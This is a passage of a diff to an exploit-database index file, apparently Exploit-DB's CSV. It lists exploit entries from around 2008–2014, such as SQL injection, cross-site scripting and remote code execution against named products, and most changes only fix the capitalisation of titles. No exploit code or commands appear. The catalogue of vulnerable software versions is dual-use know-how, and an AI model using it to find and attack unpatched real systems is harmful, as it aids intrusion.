Cross-Site Scripting Vulnerabilities",2008-09-06,"Maximiliano Soler",php,webapps,0 32338,platforms/php/webapps/32338.txt,"phpAdultSite CMS - 'results_per_page' Parameter Cross-Site Scripting",2008-09-07,"David Sopas",php,webapps,0 32339,platforms/windows/remote/32339.txt,"Microsoft Organization Chart 2 - Remote Code Execution",2008-09-08,"Ivan Sanchez",windows,remote,0 32340,platforms/php/webapps/32340.txt,"Gallery 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-08,sl4xUz,php,webapps,0 -32341,platforms/hardware/dos/32341.html,"Apple iPhone 1.1.4/2.0 and iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Function Remote Denial of Service",2008-09-12,"Nicolas Economou",hardware,dos,0 +32341,platforms/hardware/dos/32341.html,"Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Function Remote Denial of Service",2008-09-12,"Nicolas Economou",hardware,dos,0 32342,platforms/php/webapps/32342.txt,"eXtrovert software Thyme 1.3 - 'pick_users.php' SQL Injection",2008-09-08,"Omer Singer",php,webapps,0 -32343,platforms/php/local/32343.php,"PHP 5.2.5 - Multiple Functions 'safe_mode_exec_dir' and 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local,0 +32343,platforms/php/local/32343.php,"PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' and 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local,0 32344,platforms/windows/remote/32344.txt,"Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (1)",2008-09-08,Ciph3r,windows,remote,0 32345,platforms/windows/remote/32345.cpp,"Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (2)",2008-09-08,Ciph3r,windows,remote,0 32346,platforms/php/webapps/32346.txt,"E-PHP B2B Trading Marketplace Script - 'listings.php' SQL Injection",2008-09-07,r45c4l,php,webapps,0 -32347,platforms/php/webapps/32347.txt,"UBB.threads 7.3.1 - 'Forum[]' Array SQL Injection",2008-09-02,"James Bercegay",php,webapps,0 +32347,platforms/php/webapps/32347.txt,"UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection",2008-09-02,"James Bercegay",php,webapps,0 32348,platforms/linux/dos/32348.txt,"MySQL 6.0.4 - Empty Binary String Literal Remote Denial Of Service",2008-03-28,"Kay Roepke",linux,dos,0 32349,platforms/php/webapps/32349.txt,"PunBB 1.2.x - 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-08-20,"Henry Sudhof",php,webapps,0 32350,platforms/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 - mDNSResponder NULL Pointer Dereference Denial of Service",2008-09-09,"Mario Ballano Bárcena",windows,dos,0 @@ -29193,14 +29194,14 @@ id,file,description,date,author,platform,type,port 32375,platforms/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,php,webapps,0 32381,platforms/multiple/dos/32381.js,"Avant Browser 11.7 Build 9 - JavaScript Engine Integer Overflow",2008-09-12,0x90,multiple,dos,0 32382,platforms/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",multiple,remote,0 -32383,platforms/php/webapps/32383.txt,"PHPMyAdmin 3.2 - 'server_databases.php' Remote Command Execution",2008-09-15,"Norman Hippert",php,webapps,0 +32383,platforms/php/webapps/32383.txt,"phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution",2008-09-15,"Norman Hippert",php,webapps,0 32384,platforms/linux/dos/32384.txt,"Linux Kernel 2.6.x - 'add_to_page_cache_lru()' Local Denial of Service",2007-07-20,"Jens Axboe",linux,dos,0 32385,platforms/hardware/webapps/32385.txt,"Dlink DIR-600L Hardware Version AX Firmware 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps,0 32386,platforms/multiple/dos/32386.txt,"Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service",2008-09-16,"Luigi Auriemma",multiple,dos,0 32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injection",2008-09-25,"David Sopas",php,webapps,0 32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0 32420,platforms/windows/dos/32420.c,"Mass Downloader - Malformed Executable Denial Of Service",2008-09-25,Ciph3r,windows,dos,0 -32421,platforms/php/webapps/32421.html,"FlatPress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0 +32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0 32422,platforms/php/webapps/32422.txt,"Vikingboard 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,php,webapps,0 32423,platforms/jsp/webapps/32423.txt,"OpenNms 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 32424,platforms/jsp/webapps/32424.txt,"OpenNms 1.5.x - notification/list.jsp username Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 @@ -29211,7 +29212,7 @@ id,file,description,date,author,platform,type,port 32429,platforms/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 - ActiveX Control 'CanUninstall()' Buffer Overflow",2008-09-27,Satan_HackerS,windows,remote,0 32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 - 'wholite.cgi' Cross-Site Scripting",2008-09-27,"Ghost Hacker",cgi,webapps,0 32431,platforms/php/webapps/32431.txt,"Lyrics Script - 'search_results.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps,0 -32432,platforms/php/webapps/32432.txt,"Clickbank Portal - 'search.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps,0 +32432,platforms/php/webapps/32432.txt,"ClickBank Portal - 'search.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps,0 32433,platforms/php/webapps/32433.txt,"Membership Script - Multiple Cross-Site Scripting Vulnerabilities",2008-09-27,"Ghost Hacker",php,webapps,0 32434,platforms/php/webapps/32434.txt,"Recipe Script - 'search.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps,0 32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0 @@ -29222,7 +29223,7 @@ id,file,description,date,author,platform,type,port 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,php,webapps,0 32442,platforms/windows/remote/32442.c,"Nokia PC Suite 7.0 - Remote Buffer Overflow",2008-09-29,Ciph3r,windows,remote,0 32443,platforms/php/webapps/32443.txt,"CAcert - 'analyse.php' Cross-Site Scripting",2008-09-29,"Alexander Klink",php,webapps,0 -32444,platforms/php/webapps/32444.txt,"Wordpress MU 1.2/1.3 - 'wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",php,webapps,0 +32444,platforms/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - 'wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",php,webapps,0 32445,platforms/linux/remote/32445.txt,"MySQL 5 - Command Line Client HTML Special Characters HTML Injection",2008-09-30,"Thomas Henlich",linux,remote,0 32446,platforms/linux/local/32446.txt,"Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",linux,local,0 32447,platforms/php/webapps/32447.txt,"A4Desk Event Calendar - 'v' Parameter Remote File Inclusion",2008-09-30,Lo$er,php,webapps,0 @@ -29238,14 +29239,14 @@ id,file,description,date,author,platform,type,port 32457,platforms/windows/remote/32457.txt,"XAMPP for Windows 1.6.8 - 'cds.php' SQL Injection",2008-10-03,"Jaykishan Nirmal",windows,remote,0 32458,platforms/multiple/remote/32458.txt,"OpenNms 1.5.x - HTTP Response Splitting",2008-10-05,"BugSec LTD",multiple,remote,0 32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0 -32460,platforms/windows/remote/32460.txt,"XAMPP for Windows 1.6.8 - 'phonebook.php' SQL Injection",2008-10-06,"Jaykishan Nirmal",windows,remote,0 +32460,platforms/windows/remote/32460.txt,"XAMPP for Windows 1.6.8 - 'Phonebook.php' SQL Injection",2008-10-06,"Jaykishan Nirmal",windows,remote,0 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0 32462,platforms/php/webapps/32462.txt,"Simple Machines Forum 1.1.6 - HTTP POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0 32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - edit.php file Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32465,platforms/windows/remote/32465.pl,"Internet Download Manager 4.0.5 - File Parsing Buffer Overflow",2008-10-06,Ciph3r,windows,remote,0 32466,platforms/multiple/remote/32466.html,"Mozilla Firefox 3.0.3 - Internet Shortcut Same Origin Policy Violation",2008-10-07,"Liu Die Yu",multiple,remote,0 -32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI Redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 +32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 32468,platforms/php/webapps/32468.txt,"DFFFrameworkAPI - 'DFF_config[dir_include]' Parameter Multiple Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0 32469,platforms/hardware/remote/32469.txt,"Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection",2008-10-09,"Adrian Pastor",hardware,remote,0 32470,platforms/linux/remote/32470.rb,"CUPS 1.3.7 - 'HP-GL/2' Filter Remote Code Execution",2008-10-09,regenrecht,linux,remote,0 @@ -29253,9 +29254,9 @@ id,file,description,date,author,platform,type,port 32472,platforms/hardware/dos/32472.txt,"Nokia Web Browser for S60 - Infinite Array Sort Denial of Service",2008-10-10,"Luca Carettoni",hardware,dos,0 32473,platforms/php/webapps/32473.txt,"com_jeux Joomla! Component - 'id' Parameter SQL Injection",2008-10-11,H!tm@N,php,webapps,0 32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 - 'index.php' Cross-Site Scripting",2008-10-11,d3v1l,php,webapps,0 -32475,platforms/multiple/remote/32475.sql,"Oracle Database Server 11.1 - 'CREATE ANY DIRECTORY' Privilege Escalation",2008-10-13,"Paul M. Wright",multiple,remote,0 +32475,platforms/multiple/remote/32475.sql,"Oracle Database Server 11.1 - 'CREATE ANY Directory' Privilege Escalation",2008-10-13,"Paul M. Wright",multiple,remote,0 32564,platforms/multiple/remote/32564.txt,"XWork 2.0.x - 'ParameterInterceptor' Class OGNL Security Bypass",2008-11-04,"Meder Kydyraliev",multiple,remote,0 -32477,platforms/windows/dos/32477.py,"Windows Media Player 11.0.5721.5230 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32477,platforms/windows/dos/32477.py,"Microsoft Windows Media Player 11.0.5721.5230 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32478,platforms/windows/dos/32478.py,"jetVideo 8.1.1 - Basic '.wav' Local Crash (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary Upload",2014-03-24,"felipe andrian",php,webapps,0 32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 @@ -29268,7 +29269,7 @@ id,file,description,date,author,platform,type,port 32486,platforms/php/webapps/32486.txt,"Webscene eCommerce - 'productlist.php' SQL Injection",2008-10-14,"Angela Chang",php,webapps,0 32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 - modules/mod_language.php Multiple Parameter Cross-Site Scripting",2008-10-14,faithlove,php,webapps,0 32488,platforms/php/webapps/32488.txt,"Elxis CMS 2008.1 - PHPSESSID Variable Session Fixation",2008-10-14,faithlove,php,webapps,0 -32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' URI Redirection",2008-10-15,"Martin Suess",windows,remote,0 +32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' URI redirection",2008-10-15,"Martin Suess",windows,remote,0 32490,platforms/php/webapps/32490.txt,"SweetCMS 1.5.2 - 'index.php' SQL Injection",2008-10-14,Dapirates,php,webapps,0 32491,platforms/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 - ActiveX Control 'PlainTextPassword()' Buffer Overflow",2008-10-16,"Thomas Pollet",windows,remote,0 32492,platforms/php/webapps/32492.txt,"Habari 0.5.1 - 'habari_username' Parameter Cross-Site Scripting",2008-10-16,faithlove,php,webapps,0 @@ -29281,25 +29282,25 @@ id,file,description,date,author,platform,type,port 32499,platforms/php/webapps/32499.txt,"PHPhotoGallery 0.92 - 'index.php' SQL Injection",2008-10-21,KnocKout,php,webapps,0 32500,platforms/asp/webapps/32500.txt,"Bahar Download Script 2.0 - 'aspkat.asp' SQL Injection",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0 -32502,platforms/php/webapps/32502.txt,"GetSimple CMS 3.3.1 - Persistent Cross-Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0 +32502,platforms/php/webapps/32502.txt,"Getsimple CMS 3.3.1 - Persistent Cross-Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0 32503,platforms/php/webapps/32503.txt,"Cart Engine 3.0.0 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 - (task.php) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 - Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 -32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 - (run parameter) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 +32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 - (run Parameter) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 - (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - '.m3u' / '.pls' / '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - '.m3u' / '.pls '/ '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) - users/update_roles Missing Authorization",2014-03-26,Metasploit,linux,remote,443 -32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - (xhr.php i parameter) SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 +32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - (xhr.php i Parameter) SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - ftp:// URL Multiple File Format Handling Cross-Site Scripting",2008-10-21,"Muris Kurgas",windows,remote,0 32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - ftp:// URL Multiple File Format Handling Cross-Site Scripting",2008-10-21,"Muris Kurgas",windows,remote,0 32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusion",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 32522,platforms/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos,0 -32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' URI Redirection",2008-10-23,xuanmumu,php,webapps,0 +32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' URI redirection",2008-10-23,xuanmumu,php,webapps,0 32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection",2008-10-23,xuanmumu,php,webapps,0 32525,platforms/php/webapps/32525.txt,"Jetbox CMS 2.1 - 'liste' Parameter Cross-Site Scripting",2008-10-23,"Omer Singer",php,webapps,0 32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 - 'fullscreen.php' Cross-Site Scripting",2008-10-23,ShockShadow,php,webapps,0 @@ -29307,7 +29308,7 @@ id,file,description,date,author,platform,type,port 32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 - 'pg' Parameter Cross-Site Scripting",2008-10-24,"Ghost Hacker",php,webapps,0 32529,platforms/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 - Remote Command Execution",2008-10-25,"Varun Srivastava",multiple,remote,0 32530,platforms/linux/remote/32530.txt,"Lynx 2.8 - '.mailcap' and '.mime.type' Files Local Code Execution",2008-11-03,"Piotr Engelking",linux,remote,0 -32531,platforms/php/webapps/32531.txt,"PHPMyAdmin 3.0.1 - 'pmd_pdf.php' Cross-Site Scripting",2008-10-27,"Hadi Kiamarsi",php,webapps,0 +32531,platforms/php/webapps/32531.txt,"phpMyAdmin 3.0.1 - 'pmd_pdf.php' Cross-Site Scripting",2008-10-27,"Hadi Kiamarsi",php,webapps,0 32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 - 'include/common.php' Remote File Inclusion",2008-10-27,Cru3l.b0y,php,webapps,0 32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 - 'index.php' Multiple SQL Injection",2008-10-27,G4N0K,php,webapps,0 32534,platforms/unix/dos/32534.py,"Python 2.5.2 - 'Imageop' Module Argument Validation Buffer Overflow",2008-10-27,"Chris Evans",unix,dos,0 @@ -29315,7 +29316,7 @@ id,file,description,date,author,platform,type,port 32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 - 'modules/banners/click.php' SQL Injection",2008-10-27,DeltahackingTEAM,php,webapps,0 32537,platforms/php/webapps/32537.txt,"All In One 1.4 Control Panel - 'cp_polls_results.php' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 32538,platforms/php/webapps/32538.txt,"PHP-Nuke Nuke League Module - 'tid' Parameter Cross-Site Scripting",2008-10-28,Ehsan_Hp200,php,webapps,0 -32539,platforms/php/webapps/32539.html,"Microsoft Internet Explorer 6.0 - '&NBSP;' Address Bar URI Spoofing",2008-10-27,"Amit Klein",php,webapps,0 +32539,platforms/php/webapps/32539.html,"Microsoft Internet Explorer 6 - '&NBSP;' Address Bar URI Spoofing",2008-10-27,"Amit Klein",php,webapps,0 32540,platforms/php/webapps/32540.pl,"H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass Vulnerabilities",2008-10-28,StAkeR,php,webapps,0 32541,platforms/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,php,webapps,0 32542,platforms/php/webapps/32542.txt,"Elkagroup Image Gallery 1.0 - 'view.php' SQL Injection",2008-10-28,G4N0K,php,webapps,0 @@ -29326,7 +29327,7 @@ id,file,description,date,author,platform,type,port 32547,platforms/php/webapps/32547.txt,"Extrakt Framework 0.7 - 'index.php' Cross-Site Scripting",2008-10-29,ShockShadow,php,webapps,0 32548,platforms/linux/remote/32548.html,"Opera Web Browser 9.x - History Search and Links Panel Cross-Site Scripting",2008-10-30,"Stefano Di Paola",linux,remote,0 32549,platforms/asp/webapps/32549.txt,"Dorsa CMS - 'Default_.aspx' Cross-Site Scripting",2008-10-29,Pouya_Server,asp,webapps,0 -32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 - ' CrashHangExt.dll' ActiveX Control Remote Denial of Service",2008-10-30,suN8Hclf,windows,dos,0 +32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service",2008-10-30,suN8Hclf,windows,dos,0 32551,platforms/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,linux,dos,0 32552,platforms/hardware/remote/32552.txt,"SonicWALL - Content Filtering Blocked Site Error Page Cross-Site Scripting",2008-10-30,pagvac,hardware,remote,0 32553,platforms/php/webapps/32553.txt,"phpWebSite 0.9.3 - 'links.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps,0 @@ -29382,7 +29383,7 @@ id,file,description,date,author,platform,type,port 32605,platforms/php/webapps/32605.txt,"Venalsur Booking Centre 2.01 - Multiple Cross-Site Scripting Vulnerabilities",2008-11-29,Pouya_Server,php,webapps,0 32606,platforms/php/webapps/32606.txt,"Basic CMS - 'q' Parameter Cross-Site Scripting",2008-11-29,Pouya_Server,php,webapps,0 32607,platforms/php/webapps/32607.txt,"RakhiSoftware Shopping Cart - product.php Multiple Parameter Cross-Site Scripting",2008-11-28,"Charalambous Glafkos",php,webapps,0 -32608,platforms/php/webapps/32608.txt,"RakhiSoftware Shopping Cart - PHPSESSID Cookie Manipulation Full Path Disclosure",2008-11-28,"Charalambous Glafkos",php,webapps,0 +32608,platforms/php/webapps/32608.txt,"RakhiSoftware Shopping Cart - PHPSESSID Cookie manipulation Full Path Disclosure",2008-11-28,"Charalambous Glafkos",php,webapps,0 32609,platforms/asp/webapps/32609.txt,"Pre Classified Listings 1.0 - 'detailad.asp' SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 32610,platforms/asp/webapps/32610.txt,"Pre Classified Listings 1.0 - 'signup.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32611,platforms/asp/webapps/32611.txt,"CodeToad ASP Shopping Cart Script - Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 @@ -29395,7 +29396,7 @@ id,file,description,date,author,platform,type,port 32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - Cross-Site Scripting / Remote Shell Exploit / Credentials Leak",2014-03-31,neglomaniac,php,remote,0 32619,platforms/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,52789 32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080 -32622,platforms/php/webapps/32622.txt,"Wordpress Ajax Pagination Plugin 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80 +32622,platforms/php/webapps/32622.txt,"WordPress Ajax Pagination Plugin 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80 32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",multiple,webapps,0 32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - siteadmin/forgot.php adname Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0 32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - siteadmin/forgot.php Multiple Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 @@ -29417,7 +29418,7 @@ id,file,description,date,author,platform,type,port 32641,platforms/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,php,webapps,0 32642,platforms/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps,0 32643,platforms/windows/remote/32643.txt,"PhonerLite 2.14 SIP Soft Phone - SIP Digest Disclosure",2014-04-01,"Jason Ostrom",windows,remote,5060 -32644,platforms/php/webapps/32644.txt,"AlienVault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443 +32644,platforms/php/webapps/32644.txt,"Alienvault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443 32645,platforms/php/webapps/32645.txt,"TWiki 4.x - SEARCH Variable Remote Command Execution",2008-12-06,"Troy Bollinge",php,webapps,0 32646,platforms/php/webapps/32646.txt,"TWiki 4.x - URLPARAM Variable Cross-Site Scripting",2008-12-06,"Marc Schoenefeld",php,webapps,0 32647,platforms/php/webapps/32647.txt,"PrestaShop 1.1 - admin/login.php PATH_INFO Parameter Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 @@ -29432,7 +29433,7 @@ id,file,description,date,author,platform,type,port 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injections",2008-12-01,"security curmudgeon",php,webapps,0 32657,platforms/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service",2008-12-12,NCNIPC,windows,dos,0 32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary - 'cat' Parameter SQL Injection",2008-12-13,Pouya_Server,asp,webapps,0 -32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7.0 - HTML Form Value Denial of Service",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0 +32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7 - HTML Form Value Denial of Service",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0 32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0 32661,platforms/windows/remote/32661.html,"Evans FTP - 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0 32662,platforms/php/webapps/32662.py,"WebPhotoPro - Multiple SQL Injections",2008-12-14,baltazar,php,webapps,0 @@ -29445,7 +29446,7 @@ id,file,description,date,author,platform,type,port 32669,platforms/php/webapps/32669.txt,"PHPcksec 0.2 - 'PHPcksec.php' Cross-Site Scripting",2008-12-17,ahmadbady,php,webapps,0 32670,platforms/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",php,webapps,0 32671,platforms/php/webapps/32671.txt,"DO-CMS 3.0 - 'p' Parameter Multiple SQL Injection",2008-12-18,"crash over",php,webapps,0 -32672,platforms/php/webapps/32672.txt,"EasySiteNetwork Jokes Complete Website - 'joke.php' SQL Injection",2008-12-18,Ehsan_Hp200,php,webapps,0 +32672,platforms/php/webapps/32672.txt,"Easysitenetwork Jokes Complete Website - 'joke.php' SQL Injection",2008-12-18,Ehsan_Hp200,php,webapps,0 32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0 32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0 32675,platforms/linux/dos/32675.py,"QEMU 0.9 / KVM 36/79 - VNC Server Remote Denial of Service",2008-12-22,"Alfredo Ortega",linux,dos,0 @@ -29457,7 +29458,7 @@ id,file,description,date,author,platform,type,port 32681,platforms/hardware/remote/32681.txt,"COMTREND CT-536 and HG-536 Routers - Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",hardware,remote,0 32682,platforms/linux/dos/32682.c,"Linux Kernel 2.6.x - 'qdisc_run()' Local Denial of Service",2008-12-23,"Herbert Xu",linux,dos,0 32683,platforms/asp/webapps/32683.txt,"Mavi Emlak - 'newDetail.asp' SQL Injection",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 -32684,platforms/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 - .WAV File Parsing Code Execution",2008-12-29,anonymous,windows,remote,0 +32684,platforms/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 - '.WAV' File Parsing Code Execution",2008-12-29,anonymous,windows,remote,0 32685,platforms/php/webapps/32685.txt,"ViArt Shop 3.5 